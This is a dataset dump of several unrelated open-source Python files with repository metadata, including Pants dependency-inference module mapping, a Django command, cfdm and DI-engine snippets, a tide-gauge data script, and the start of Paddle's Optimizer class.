# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import natuurpunt_purchase_search
| [
"[email protected]"
] | |
cc8a8453dcbfc50cc508c0fffb18ca9c01acbe54 | 827b7ad1cdf882824bf13717bd0baa08cc852eaf | /src/python/pants/backend/python/dependency_inference/module_mapper.py | 868969ac95364e4b502388856523007bee7f3316 | [
"Apache-2.0"
] | permissive | cclauss/pants | e4be17df24c9a962a123b94c0782d0941862220a | 4f39186f780310e73a708b3b589635dfa2e09696 | refs/heads/main | 2023-03-31T10:07:13.165248 | 2021-04-02T19:04:58 | 2021-04-02T19:04:58 | 354,131,355 | 0 | 0 | Apache-2.0 | 2021-04-02T20:56:27 | 2021-04-02T20:56:26 | null | UTF-8 | Python | false | false | 17,912 | py | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PurePath
from typing import DefaultDict
from pants.backend.python.target_types import (
ModuleMappingField,
PythonRequirementsField,
PythonSources,
)
from pants.base.specs import AddressSpecs, DescendantAddresses
from pants.core.util_rules.stripped_source_files import StrippedSourceFileNames
from pants.engine.addresses import Address
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import ExplicitlyProvidedDependencies, SourcesPathsRequest, Targets
from pants.engine.unions import UnionMembership, UnionRule, union
from pants.util.docutil import bracketed_docs_url
from pants.util.frozendict import FrozenDict
from pants.util.logging import LogLevel
from pants.util.memo import memoized_method
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PythonModule:
module: str
@classmethod
def create_from_stripped_path(cls, path: PurePath) -> PythonModule:
module_name_with_slashes = (
path.parent if path.name == "__init__.py" else path.with_suffix("")
)
return cls(module_name_with_slashes.as_posix().replace("/", "."))
# -----------------------------------------------------------------------------------------------
# First-party module mapping
# -----------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class FirstPartyPythonMappingImpl:
"""A mapping of module names to owning addresses that a specific implementation adds for Python
import dependency inference.
For almost every implementation, there should only be one address per module to avoid ambiguity.
However, the built-in implementation allows for 2 addresses when `.pyi` type stubs are used.
All ambiguous modules must be added to `ambiguous_modules` and not be included in `mapping`.
"""
mapping: FrozenDict[str, tuple[Address, ...]]
ambiguous_modules: FrozenDict[str, tuple[Address, ...]]
@union
class FirstPartyPythonMappingImplMarker:
"""An entry point for a specific implementation of mapping module names to owning targets for
Python import dependency inference.
All implementations will be merged together. Any modules that show up in multiple
implementations will be marked ambiguous.
The addresses should all be file addresses, rather than BUILD addresses.
"""
@dataclass(frozen=True)
class FirstPartyPythonModuleMapping:
"""A merged mapping of module names to owning addresses.
This mapping may have been constructed from multiple distinct implementations, e.g.
implementations for each codegen backends.
"""
mapping: FrozenDict[str, tuple[Address, ...]]
ambiguous_modules: FrozenDict[str, tuple[Address, ...]]
def addresses_for_module(self, module: str) -> tuple[tuple[Address, ...], tuple[Address, ...]]:
"""Return all unambiguous and ambiguous addresses.
The unambiguous addresses should be 0-2, but not more. We only expect 2 if there is both an
implementation (.py) and type stub (.pyi) with the same module name.
"""
unambiguous = self.mapping.get(module, ())
ambiguous = self.ambiguous_modules.get(module, ())
if unambiguous or ambiguous:
return unambiguous, ambiguous
# If the module is not found, try the parent, if any. This is to accommodate `from`
# imports, where we don't care about the specific symbol, but only the module. For example,
# with `from my_project.app import App`, we only care about the `my_project.app` part.
#
# We do not look past the direct parent, as this could cause multiple ambiguous owners to
# be resolved. This contrasts with the third-party module mapping, which will try every
# ancestor.
if "." not in module:
return (), ()
parent_module = module.rsplit(".", maxsplit=1)[0]
unambiguous = self.mapping.get(parent_module, ())
ambiguous = self.ambiguous_modules.get(parent_module, ())
return unambiguous, ambiguous
@rule(level=LogLevel.DEBUG)
async def merge_first_party_module_mappings(
union_membership: UnionMembership,
) -> FirstPartyPythonModuleMapping:
all_mappings = await MultiGet(
Get(
FirstPartyPythonMappingImpl,
FirstPartyPythonMappingImplMarker,
marker_cls(),
)
for marker_cls in union_membership.get(FirstPartyPythonMappingImplMarker)
)
# First, record all known ambiguous modules. We will need to check that an implementation's
# module is not ambiguous within another implementation.
modules_with_multiple_implementations: DefaultDict[str, set[Address]] = defaultdict(set)
for mapping_impl in all_mappings:
for module, addresses in mapping_impl.ambiguous_modules.items():
modules_with_multiple_implementations[module].update(addresses)
# Then, merge the unambiguous modules within each MappingImpls while checking for ambiguity
# across the other implementations.
modules_to_addresses: dict[str, tuple[Address, ...]] = {}
for mapping_impl in all_mappings:
for module, addresses in mapping_impl.mapping.items():
if module in modules_with_multiple_implementations:
modules_with_multiple_implementations[module].update(addresses)
elif module in modules_to_addresses:
modules_with_multiple_implementations[module].update(
{*modules_to_addresses[module], *addresses}
)
else:
modules_to_addresses[module] = addresses
# Finally, remove any newly ambiguous modules from the previous step.
for module in modules_with_multiple_implementations:
if module in modules_to_addresses:
modules_to_addresses.pop(module)
return FirstPartyPythonModuleMapping(
mapping=FrozenDict(sorted(modules_to_addresses.items())),
ambiguous_modules=FrozenDict(
(k, tuple(sorted(v))) for k, v in sorted(modules_with_multiple_implementations.items())
),
)
# This is only used to register our implementation with the plugin hook via unions. Note that we
# implement this like any other plugin implementation so that we can run them all in parallel.
class FirstPartyPythonTargetsMappingMarker(FirstPartyPythonMappingImplMarker):
pass
@rule(desc="Creating map of first party Python targets to Python modules", level=LogLevel.DEBUG)
async def map_first_party_python_targets_to_modules(
_: FirstPartyPythonTargetsMappingMarker,
) -> FirstPartyPythonMappingImpl:
all_expanded_targets = await Get(Targets, AddressSpecs([DescendantAddresses("")]))
python_targets = tuple(tgt for tgt in all_expanded_targets if tgt.has_field(PythonSources))
stripped_sources_per_target = await MultiGet(
Get(StrippedSourceFileNames, SourcesPathsRequest(tgt[PythonSources]))
for tgt in python_targets
)
modules_to_addresses: DefaultDict[str, list[Address]] = defaultdict(list)
modules_with_multiple_implementations: DefaultDict[str, set[Address]] = defaultdict(set)
for tgt, stripped_sources in zip(python_targets, stripped_sources_per_target):
for stripped_f in stripped_sources:
module = PythonModule.create_from_stripped_path(PurePath(stripped_f)).module
if module in modules_to_addresses:
# We check if one of the targets is an implementation (.py file) and the other is
# a type stub (.pyi file), which we allow. Otherwise, we have ambiguity.
either_targets_are_type_stubs = len(modules_to_addresses[module]) == 1 and (
tgt.address.filename.endswith(".pyi")
or modules_to_addresses[module][0].filename.endswith(".pyi")
)
if either_targets_are_type_stubs:
modules_to_addresses[module].append(tgt.address)
else:
modules_with_multiple_implementations[module].update(
{*modules_to_addresses[module], tgt.address}
)
else:
modules_to_addresses[module].append(tgt.address)
# Remove modules with ambiguous owners.
for module in modules_with_multiple_implementations:
modules_to_addresses.pop(module)
return FirstPartyPythonMappingImpl(
mapping=FrozenDict((k, tuple(sorted(v))) for k, v in sorted(modules_to_addresses.items())),
ambiguous_modules=FrozenDict(
(k, tuple(sorted(v))) for k, v in sorted(modules_with_multiple_implementations.items())
),
)
# -----------------------------------------------------------------------------------------------
# Third party module mapping
# -----------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class ThirdPartyPythonModuleMapping:
mapping: FrozenDict[str, Address]
ambiguous_modules: FrozenDict[str, tuple[Address, ...]]
def address_for_module(self, module: str) -> tuple[Address | None, tuple[Address, ...]]:
"""Return the unambiguous owner (if any) and all ambiguous addresses."""
unambiguous = self.mapping.get(module)
ambiguous = self.ambiguous_modules.get(module, ())
if unambiguous or ambiguous:
return unambiguous, ambiguous
# If the module is not found, recursively try the ancestor modules, if any. For example,
# pants.task.task.Task -> pants.task.task -> pants.task -> pants
if "." not in module:
return None, ()
parent_module = module.rsplit(".", maxsplit=1)[0]
return self.address_for_module(parent_module)
@rule(desc="Creating map of third party targets to Python modules", level=LogLevel.DEBUG)
async def map_third_party_modules_to_addresses() -> ThirdPartyPythonModuleMapping:
all_targets = await Get(Targets, AddressSpecs([DescendantAddresses("")]))
modules_to_addresses: dict[str, Address] = {}
modules_with_multiple_owners: DefaultDict[str, set[Address]] = defaultdict(set)
for tgt in all_targets:
if not tgt.has_field(PythonRequirementsField):
continue
module_map = tgt.get(ModuleMappingField).value
for python_req in tgt[PythonRequirementsField].value:
modules = module_map.get(
python_req.project_name,
[python_req.project_name.lower().replace("-", "_")],
)
for module in modules:
if module in modules_to_addresses:
modules_with_multiple_owners[module].update(
{modules_to_addresses[module], tgt.address}
)
else:
modules_to_addresses[module] = tgt.address
# Remove modules with ambiguous owners.
for module in modules_with_multiple_owners:
modules_to_addresses.pop(module)
return ThirdPartyPythonModuleMapping(
mapping=FrozenDict(sorted(modules_to_addresses.items())),
ambiguous_modules=FrozenDict(
(k, tuple(sorted(v))) for k, v in sorted(modules_with_multiple_owners.items())
),
)
# -----------------------------------------------------------------------------------------------
# module -> owners
# -----------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class PythonModuleOwners:
"""The target(s) that own a Python module.
If >1 targets own the same module, and they're implementations (vs .pyi type stubs), they will
be put into `ambiguous` instead of `unambiguous`. `unambiguous` should never be > 2.
"""
unambiguous: tuple[Address, ...]
ambiguous: tuple[Address, ...] = ()
def __post_init__(self) -> None:
if self.unambiguous and self.ambiguous:
raise AssertionError(
"A module has both unambiguous and ambiguous owners, which is a bug in the "
"dependency inference code. Please file a bug report at "
"https://github.com/pantsbuild/pants/issues/new."
)
@memoized_method
def _unambiguous_via_includes(
self, explicitly_provided: ExplicitlyProvidedDependencies
) -> bool:
# NB: `self.ambiguous` is always file addresses, but we allow for their original BUILD
# targets to disambiguate them.
disambiguation_candidates = {
*(addr.maybe_convert_to_build_target() for addr in self.ambiguous),
*self.ambiguous,
}
return bool(disambiguation_candidates.intersection(explicitly_provided.includes))
@memoized_method
def _remaining_after_ignores(
self, explicitly_provided: ExplicitlyProvidedDependencies
) -> set[Address]:
# NB: `self.ambiguous` is always file addresses, but we allow for their original BUILD
# targets to disambiguate them.
return {
addr
for addr in self.ambiguous
if addr not in explicitly_provided.ignores
and addr.maybe_convert_to_build_target() not in explicitly_provided.ignores
}
def maybe_warn_of_ambiguity(
self,
explicitly_provided_deps: ExplicitlyProvidedDependencies,
original_address: Address,
*,
context: str,
) -> None:
"""If the module is ambiguous and the user did not disambiguate via explicitly provided
dependencies, warn that dependency inference will not be used."""
if not self.ambiguous or self._unambiguous_via_includes(explicitly_provided_deps):
return
remaining_after_ignores = self._remaining_after_ignores(explicitly_provided_deps)
if len(remaining_after_ignores) <= 1:
return
logger.warning(
f"{context}, but Pants cannot safely infer a dependency because >1 target exports "
f"this module, so it is ambiguous which to use: "
f"{sorted(addr.spec for addr in remaining_after_ignores)}."
f"\n\nPlease explicitly include the dependency you want in the `dependencies` "
f"field of {original_address}, or ignore the ones you do not want by prefixing "
f"with `!` or `!!` so that <=1 targets are left."
f"\n\nAlternatively, you can remove the ambiguity by deleting/changing some of the "
f"targets so that only 1 target exports this module. Refer to "
f"{bracketed_docs_url('troubleshooting#import-errors-and-missing-dependencies')}."
)
def disambiguated_via_ignores(
self, explicitly_provided_deps: ExplicitlyProvidedDependencies
) -> Address | None:
"""If ignores in the `dependencies` field ignore all but one of the ambiguous owners, the
remaining owner becomes unambiguous."""
if not self.ambiguous or self._unambiguous_via_includes(explicitly_provided_deps):
return None
remaining_after_ignores = self._remaining_after_ignores(explicitly_provided_deps)
return list(remaining_after_ignores)[0] if len(remaining_after_ignores) == 1 else None
@rule
async def map_module_to_address(
module: PythonModule,
first_party_mapping: FirstPartyPythonModuleMapping,
third_party_mapping: ThirdPartyPythonModuleMapping,
) -> PythonModuleOwners:
third_party_address, third_party_ambiguous = third_party_mapping.address_for_module(
module.module
)
first_party_addresses, first_party_ambiguous = first_party_mapping.addresses_for_module(
module.module
)
# First, check if there was any ambiguity within the first-party or third-party mappings. Note
# that even if there's ambiguity purely within either third-party or first-party, all targets
# with that module become ambiguous.
if third_party_ambiguous or first_party_ambiguous:
ambiguous = {*third_party_ambiguous, *first_party_ambiguous, *first_party_addresses}
if third_party_address:
ambiguous.add(third_party_address)
return PythonModuleOwners((), ambiguous=tuple(sorted(ambiguous)))
# It's possible for a user to write type stubs (`.pyi` files) for their third-party
# dependencies. We check if that happened, but we're strict in validating that there is only a
# single third party address and a single first-party address referring to a `.pyi` file;
# otherwise, we have ambiguous implementations.
if third_party_address and not first_party_addresses:
return PythonModuleOwners((third_party_address,))
first_party_is_type_stub = len(first_party_addresses) == 1 and first_party_addresses[
0
].filename.endswith(".pyi")
if third_party_address and first_party_is_type_stub:
return PythonModuleOwners((third_party_address, *first_party_addresses))
# Else, we have ambiguity between the third-party and first-party addresses.
if third_party_address and first_party_addresses:
return PythonModuleOwners(
(), ambiguous=tuple(sorted((third_party_address, *first_party_addresses)))
)
# We're done with looking at third-party addresses, and now solely look at first-party, which
# was already validated for ambiguity.
if first_party_addresses:
return PythonModuleOwners(first_party_addresses)
return PythonModuleOwners(())
def rules():
return (
*collect_rules(),
UnionRule(FirstPartyPythonMappingImplMarker, FirstPartyPythonTargetsMappingMarker),
)
| [
"[email protected]"
] | |
8ee2d7c7cfec8a059e6c4f84dfb4a253e1464a52 | 89a90707983bdd1ae253f7c59cd4b7543c9eda7e | /python_cookbook/10/monkeypatching_modules_on_import1.py | 89edccaa9b169b1d124990a2c3e05dd183a7d93b | [] | no_license | timothyshull/python_reference_code | 692a7c29608cadfd46a6cc409a000023e95b9458 | f3e2205dd070fd3210316f5f470d371950945028 | refs/heads/master | 2021-01-22T20:44:07.018811 | 2017-03-17T19:17:22 | 2017-03-17T19:17:22 | 85,346,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | from postimport import when_imported
@when_imported('threading')
def warn_threads(mod):
print('Threads? Are you crazy?')
if __name__ == '__main__':
pass
| [
"[email protected]"
] | |
8fb6bfee4530acca0b7936e56a0c29ede098296b | 2be5b2a6f5172b37fde90b076504fa9fe4f93784 | /nosmsd/management/commands/nosmsd_incoming.py | a31a1677e93343f07145d84bad79c89cede66b3e | [] | no_license | pedrokiefer/nosmsd | 74b73e959b8482744531caf4f81e7515791a5ff3 | e69d7f55d54f0f5e85eec16cde6da0cb64d63b5c | refs/heads/master | 2021-01-14T13:17:11.680061 | 2014-11-25T13:34:31 | 2014-11-25T13:34:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | #!/usr/bin/env python
# encoding=utf-8
# maintainer: rgaudin
import sys
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils import translation
from nosmsd.nosmsd_incoming import handle as nohandle
class Command(BaseCommand):
def handle(self, *args, **options):
translation.activate(settings.DEFAULT_LOCALE)
args = (u"%s %s" % (sys.argv[0], u"nosmsd_incoming"),) + args
nohandle(*args, DJANGO=True)
translation.deactivate()
| [
"[email protected]"
] | |
28ef3309ea1c0af7d7c199ff4dfdcf9e68caf048 | 4254c7f88b95c7aec20979691aecf63053c97570 | /cfdm/core/bounds.py | b3d70390051fcf096b1fe5d9ae2ad1b2f42f5528 | [
"MIT"
] | permissive | cofinoa/cfdm | 2a1fc2069ef253c6eb4a71a4d1fa252295d9be1d | 1e074dbc28054780a9ec667d61b9098b94956ea6 | refs/heads/master | 2020-05-07T08:39:24.996138 | 2019-04-08T14:34:56 | 2019-04-08T14:34:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,016 | py | from builtins import super
from . import abstract
class Bounds(abstract.PropertiesData):
'''A cell bounds component of a coordinate or domain ancillary
construct of the CF data model.
An array of cell bounds spans the same domain axes as its coordinate
array, with the addition of an extra dimension whose size is that of
the number of vertices of each cell. This extra dimension does not
correspond to a domain axis construct since it does not relate to an
independent axis of the domain. Note that, for climatological time
axes, the bounds are interpreted in a special way indicated by the
cell method constructs.
.. versionadded:: 1.7.0
'''
def __init__(self, properties=None, data=None, source=None,
copy=True, _use_data=True):
'''**Initialization**
:Parameters:
properties: `dict`, optional
Set descriptive properties. The dictionary keys are property
names, with corresponding values. Ignored if the *source*
parameter is set.
*Parameter example:*
``properties={'standard_name': 'altitude'}``
Properties may also be set after initialisation with the
`set_properties` and `set_property` methods.
data: `Data`, optional
Set the data. Ignored if the *source* parameter is set.
The data also may be set after initialisation with the
`set_data` method.
source: optional
Override the *properties* and *data* parameters with
``source.properties()`` and ``source.get_data(None)``
respectively.
If *source* does not have one of these methods, then the
corresponding parameter is not set.
copy: `bool`, optional
If False then do not deep copy input parameters prior to
initialization. By default arguments are deep copied.
'''
super().__init__(properties=properties, data=data,
source=source, copy=copy)
#--- End: def
#--- End: class
| [
"[email protected]"
] | |
aaf0fcdaee70b39287fea8239def89eee1d419c9 | ba54b70f93fe7f9d114623d76b1ad3f88309d66f | /uvideo/forms.py | 99e3e96d880007e37a2d6a8887d3860983e0d765 | [] | no_license | loobinsk/newprj | 9769b2f26092ce7dd8612fce37adebb307b01b8b | c6aa6a46973fb46375f4b05a86fe76207a8ae16d | refs/heads/master | 2023-05-07T00:28:44.242163 | 2021-05-25T08:22:05 | 2021-05-25T08:22:05 | 370,617,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | #-*- coding: utf-8 -*-
from django import forms
from uvideo.models import UserVideo
from django.template import loader, Context
from gutils.forms import BootstrapFormMixin
class UploadVideoWidget(forms.HiddenInput):
def render(self, name, value, attrs=None):
tmpl = loader.get_template('uvideo/video-upload-input.html')
return tmpl.render(Context({
'input': super(UploadVideoWidget, self).render(name, value, attrs=None),
'id': name,
}))
class UserVideoForm(BootstrapFormMixin, forms.ModelForm):
class Meta:
model = UserVideo
fields = ['url']
| [
"[email protected]"
] | |
736e9e1a22663053a31a445dbb2ce7cecb2841c3 | 232fc2c14942d3e7e28877b502841e6f88696c1a | /ding/interaction/config/base.py | 446e260203ff8119d34f20748b6d29698b85da7d | [
"Apache-2.0"
] | permissive | shengxuesun/DI-engine | ebf84221b115b38b4b3fdf3079c66fe81d42d0f7 | eb483fa6e46602d58c8e7d2ca1e566adca28e703 | refs/heads/main | 2023-06-14T23:27:06.606334 | 2021-07-12T12:36:18 | 2021-07-12T12:36:18 | 385,454,483 | 1 | 0 | Apache-2.0 | 2021-07-13T02:56:27 | 2021-07-13T02:56:27 | null | UTF-8 | Python | false | false | 432 | py | # System configs
GLOBAL_HOST = '0.0.0.0'
LOCAL_HOST = '127.0.0.1'
# General request
DEFAULT_REQUEST_RETRIES = 5
DEFAULT_REQUEST_RETRY_WAITING = 1.0
# Slave configs
MIN_HEARTBEAT_SPAN = 0.2
DEFAULT_HEARTBEAT_SPAN = 3.0
DEFAULT_SLAVE_PORT = 7236
# Master configs
MIN_HEARTBEAT_CHECK_SPAN = 0.1
DEFAULT_HEARTBEAT_CHECK_SPAN = 1.0
DEFAULT_HEARTBEAT_TOLERANCE = 17.0
DEFAULT_MASTER_PORT = 7235
# Two-side configs
DEFAULT_CHANNEL = 0
| [
"[email protected]"
] | |
b2e4985b6430b407be3fe3d835729ebeb8aa2e69 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/combine82/502-tideGauge.py | 658865e7aebe194e5247d2a059242aa96349e091 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,117 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 16 16:11:00 2020
--------------------------------------------
Load predictors for each TG and combine them
--------------------------------------------
@author: Michael Tadesse
"""
import os
import pandas as pd
#define directories
dir_in = '/lustre/fs0/home/mtadesse/eraFiveConcat'
dir_out = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
def combine():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
#cd to where the actual file is
os.chdir(dir_in)
x = 502
y = 503
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
#looping through each TG folder
os.chdir(tg_name)
#defining the path for each predictor
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp.csv'),\
"wnd_u": os.path.join(where, 'wnd_u.csv'),\
'wnd_v' : os.path.join(where, 'wnd_v.csv')}
first = True
for pr in csv_path.keys():
print(tg_name, ' ', pr)
#read predictor
pred = pd.read_csv(csv_path[pr])
#remove unwanted columns
pred.drop(['Unnamed: 0', 'Unnamed: 0.1'], axis = 1, inplace=True)
#give predictor columns a name
pred_col = list(pred.columns)
for pp in range(len(pred_col)):
if pred_col[pp] == 'date':
continue
pred_col[pp] = pr + str(pred_col[pp])
pred.columns = pred_col
#merge all predictors
if first:
pred_combined = pred
first = False
else:
pred_combined = pd.merge(pred_combined, pred, on = 'date')
#saving pred_combined
os.chdir(dir_out)
pred_combined.to_csv('.'.join([tg_name, 'csv']))
os.chdir(dir_in)
print('\n')
#run script
combine()
| [
"[email protected]"
] | |
eb5d81611f58b26a2fceac11bd14ca8653373c86 | 18aee5d93a63eab684fe69e3aa0abd1372dd5d08 | /python/paddle/optimizer/optimizer.py | 5187a651b97830ab24fe04e8fa4ce452fea65510 | [
"Apache-2.0"
] | permissive | Shixiaowei02/Paddle | 8d049f4f29e281de2fb1ffcd143997c88078eadb | 3d4d995f26c48f7792b325806ec3d110fc59f6fc | refs/heads/develop | 2023-06-26T06:25:48.074273 | 2023-06-14T06:40:21 | 2023-06-14T06:40:21 | 174,320,213 | 2 | 1 | Apache-2.0 | 2022-12-28T05:14:30 | 2019-03-07T10:09:34 | C++ | UTF-8 | Python | false | false | 66,327 | py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from collections import defaultdict
import numpy as np
import paddle
import paddle.autograd as imperative_base
from paddle import _C_ops
from paddle.fluid import core
from paddle.fluid.framework import (
Variable,
_current_expected_place,
default_main_program,
device_guard,
in_dygraph_mode,
name_scope,
)
from paddle.regularizer import L2Decay
from ..fluid import framework, unique_name
from ..fluid.backward import _get_no_grad_set_name, append_backward
from ..fluid.framework import Parameter, program_guard
from ..fluid.layer_helper import LayerHelper
from .lr import LRScheduler
__all__ = []
@framework.static_only
def append_backward_new(
loss_list,
parameter_list=None,
no_grad_set=None,
callbacks=None,
checkpoints=None,
distop_context=None,
):
from paddle.incubate.autograd.primx import Transform, orig2prim
program = default_main_program()
assert (
program.num_blocks == 1
), "The append_backward_new interface is designed to process only one block."
block = program.current_block()
for el in loss_list:
assert (
el.block == block
), 'variable in loss_list should be in current block of main program'
orig2prim(block)
ad = Transform(block)
if parameter_list is None:
parameter_list = program.global_block().all_parameters()
param_dot, loss_dot = ad.linearize(parameter_list, loss_list)
loss_bar, param_bar = ad.transpose(loss_dot, param_dot)
# remove param_dot and their constructor ops
op_indexes = []
for var in param_dot:
if var is not None:
op_index = block.ops.index(var.op)
assert op_index >= 0
op_indexes.append(op_index)
ad.erase_ops(sorted(op_indexes))
ad.erase_dots(param_dot)
if len(parameter_list) == 1:
params_and_grads = [(parameter_list, param_bar)]
else:
params_and_grads = []
for i, param in enumerate(parameter_list):
params_and_grads.append((param, param_bar[i]))
return params_and_grads
class Optimizer:
r"""Optimizer Base class.
Define the common interface of an optimizer.
User should not use this class directly,
but need to use one of it's implementation.
Args:
learning_rate (float|LRScheduler): The learning rate used to update ``Parameter``.
It can be a float value or any subclass of ``LRScheduler`` .
parameters (list|tuple, optional): List/Tuple of ``Tensor`` names to update to minimize ``loss``. \
This parameter is required in dygraph mode. And you can specify different options for \
different parameter groups such as the learning rate, weight decay, etc, \
then the parameters are list of dict. Note that the learning_rate in paramter groups \
represents the scale of base learning_rate. \
The default value is None in static graph mode, at this time all parameters will be updated.
weight_decay (float|WeightDecayRegularizer, optional): The strategy of regularization. \
It canbe a float value as coeff of L2 regularization or \
:ref:`api_fluid_regularizer_L1Decay`, :ref:`api_fluid_regularizer_L2Decay`.
If a parameter has set regularizer using :ref:`api_fluid_ParamAttr` already, \
the regularization setting here in optimizer will be ignored for this parameter. \
Otherwise, the regularization setting here in optimizer will take effect. \
Default None, meaning there is no regularization.
grad_clip (GradientClipBase, optional): Gradient cliping strategy, it's an instance of \
some derived class of ``GradientClipBase`` . There are three cliping strategies \
( :ref:`api_fluid_clip_GradientClipByGlobalNorm` , :ref:`api_fluid_clip_GradientClipByNorm` , \
:ref:`api_fluid_clip_GradientClipByValue` ). Default None, meaning there is no gradient clipping.
name (str, optional): Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`.
The default value is None.
Returns:
Base class for optimizer.
Examples:
.. code-block:: python
#Take the subclass adam as an example
import paddle
linear = paddle.nn.Linear(10, 10)
inp = paddle.uniform(shape=[10, 10], min=-0.1, max=0.1)
out = linear(inp)
loss = paddle.mean(out)
adam = paddle.optimizer.Adam(learning_rate=0.1,
parameters=linear.parameters())
loss.backward()
adam.step()
adam.clear_grad()
#Take the subclass sgd as an example
#optimize parameters in linear_1 and linear2 in different options.
#Note that the learning_rate of linear_2 is 0.01.
linear_1 = paddle.nn.Linear(10, 10)
linear_2 = paddle.nn.Linear(10, 10)
inp = paddle.uniform(shape=[10, 10], min=-0.1, max=0.1)
out = linear_1(inp)
out = linear_2(out)
loss = paddle.mean(out)
sgd = paddle.optimizer.SGD(
learning_rate=0.1,
parameters=[{
'params': linear_1.parameters()
}, {
'params': linear_2.parameters(),
'weight_decay': 0.001,
'learning_rate': 0.1
}],
weight_decay=0.01)
loss.backward()
sgd.step()
sgd.clear_grad()
"""
@imperative_base.no_grad()
def __init__(
self,
learning_rate,
parameters=None,
weight_decay=None,
grad_clip=None,
name=None,
):
if parameters is not None:
# paddle.Tensor is also iterable, so here we don't check whether
# the input is iterable, if the input is paddle.Tensor, the
# list(paddle.Tensor) will be a error value
if isinstance(parameters, (paddle.Tensor, core.eager.Tensor)):
raise TypeError(
"`parameters` argument given to the optimizer should be "
"an iterable of paddle Tensors, but got argument type is `{}`.".format(
type(parameters)
)
)
if isinstance(parameters, dict):
raise TypeError(
"`parameters` argument should not get dict type, "
"if parameter groups is needed, please set `parameters`"
" as list of dict"
)
self._parameter_list = list(parameters)
else:
self._parameter_list = None
self._name = name
if framework.in_dygraph_mode():
if self._parameter_list is None:
raise AttributeError(
"parameters argument given to the Optimizer should not be None in dygraph mode."
)
if weight_decay is not None:
if not isinstance(self._parameter_list[0], dict):
for param in self._parameter_list:
if (
hasattr(param, 'regularizer')
and param.regularizer is not None
):
logging.info(
"If regularizer of a Parameter has been set by 'paddle.ParamAttr' or 'static.WeightNormParamAttr' already. "
"The weight_decay[%s] in Optimizer will not take effect, and it will only be applied to other Parameters!"
% weight_decay.__str__()
)
break
if not isinstance(learning_rate, (float, LRScheduler)):
raise TypeError(
"learning rate should be float or LRScheduler, got %s here"
% type(learning_rate)
)
if grad_clip is not None:
if not isinstance(grad_clip, paddle.nn.clip.GradientClipBase):
raise TypeError(
"'grad_clip' should be an instance of GradientClipBase's derived class"
)
if isinstance(weight_decay, float):
self.regularization = L2Decay(weight_decay)
else:
self.regularization = weight_decay
self._grad_clip = grad_clip
self._learning_rate = learning_rate
self._dtype = None
# Infer the dtype form parameter
if self._parameter_list:
if isinstance(self._parameter_list[0], dict):
for param_group in self._parameter_list:
assert (
'params' in param_group
), 'params should be set in parameters if parameter groups are optimized in different options'
self._dtype = self._parameter_list[0]['params'][0].dtype
else:
self._dtype = self._parameter_list[0].dtype
# each program should have a independent learning rate
# program -> tensor(learning_rate)
self._learning_rate_map = {}
# Dictionary of accumulators. Some optimizer subclasses need to
# allocate and manage extra tensors associated with the parameters
# to train. These tensors are called accumulators.
# {accum_name : { paramter_name : accumulator_for_parameter, ...}, ...}
self._accumulators = defaultdict(lambda: {})
self.helper = None
self._opti_name_list = []
self._accumulators_holder = {}
self._param_device_map = {}
self.clear_gradients = self.clear_grad
self._default_dict = {
'weight_decay': self.regularization,
'grad_clip': self._grad_clip,
}
self._param_groups = []
if self._parameter_list and isinstance(self._parameter_list[0], dict):
for param_group in self._parameter_list:
self._add_param_group(param_group.copy())
else:
self._param_groups = self._parameter_list
# NOTE: Multi Tensor: Pass in all parameters and gradients to the op kernel of the Optimizer at one time for updating for dygraph mode.
# Optimizer support list: [ paddle.optimizer.Momentum, paddle.optimizer.Adam].
self._use_multi_tensor = None
self._param_dict = self._create_multi_tensor_dict()
self._auxiliary_vars = {}
self._already_create_accumulater = set()
# create master gradients' states
self._create_master_grad_states()
def _create_master_grad_states(self):
# master gradients states
self._master_grads = {}
self._master_grad = False
def _set_auxiliary_var(self, key, val):
self._auxiliary_vars[key] = val
def _create_multi_tensor_dict(self):
n = len(self._param_groups) if self._param_groups is not None else 1
return {
'FP32_LODTensor': [[] for _ in range(n)],
'FP16_LODTensor': [[] for _ in range(n)],
}
def _get_auxiliary_var(self, key):
return self._auxiliary_vars.get(key, None)
@framework.dygraph_only
def state_dict(self):
'''
Get state dict information from optimizer. It contain all the tensor used by optimizer. For Adam optimizer, contains beta1, beta2, momentum etc. If LRScheduler have been used, global_step will be include in state dict.
If the optimizer never be called(minimize function), the state_dict is empty.
Args:
None
Returns:
state_dict(dict) : dict contains all the Tensor used by optimizer
